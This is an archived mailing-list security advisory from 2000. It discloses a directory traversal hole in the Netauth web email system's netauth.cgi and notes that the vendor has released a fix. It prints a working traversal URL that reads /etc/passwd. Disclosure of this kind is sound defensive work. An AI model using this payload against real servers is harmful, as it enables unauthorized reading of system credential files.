|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Netauth: Web Based Email Management System
From: Marc Maiffret (marc
EEYE.COM)Date: Thu Aug 17 2000 - 06:13:06 CDT
- Next message: Ussr Labs: "Re: Imail Web Service Remote DoS Attack v.2"
- Previous message: Marc Maiffret: "Imail Web Service Remote DoS Attack v.2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This is just a quick note of a simple hole in the Netauth system.
What is Netauth?
Netauth is a web based eMail management system for Windows NT and most Unix
platforms.
What is the hole?
The nethauth.cgi file
http://[server]/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../..
/etc/passwd
What is the fix?
The Netauth developers (very cool guys) fixed this whole a few months back.
So just go to their website and download the latest version.
Vendor Homepage:
http://netwinsite.com/netauth/
We found this hole while testing CHAM HTTP, few more weeks till release.
http://www.eeye.com/retina
Signed,
Marc Maiffret
Chief Hacking Officer
eCompany / eEye
T.949.349.9062
F.949.349.9538
http://eEye.com
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Next message: Ussr Labs: "Re: Imail Web Service Remote DoS Attack v.2"
- Previous message: Marc Maiffret: "Imail Web Service Remote DoS Attack v.2"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]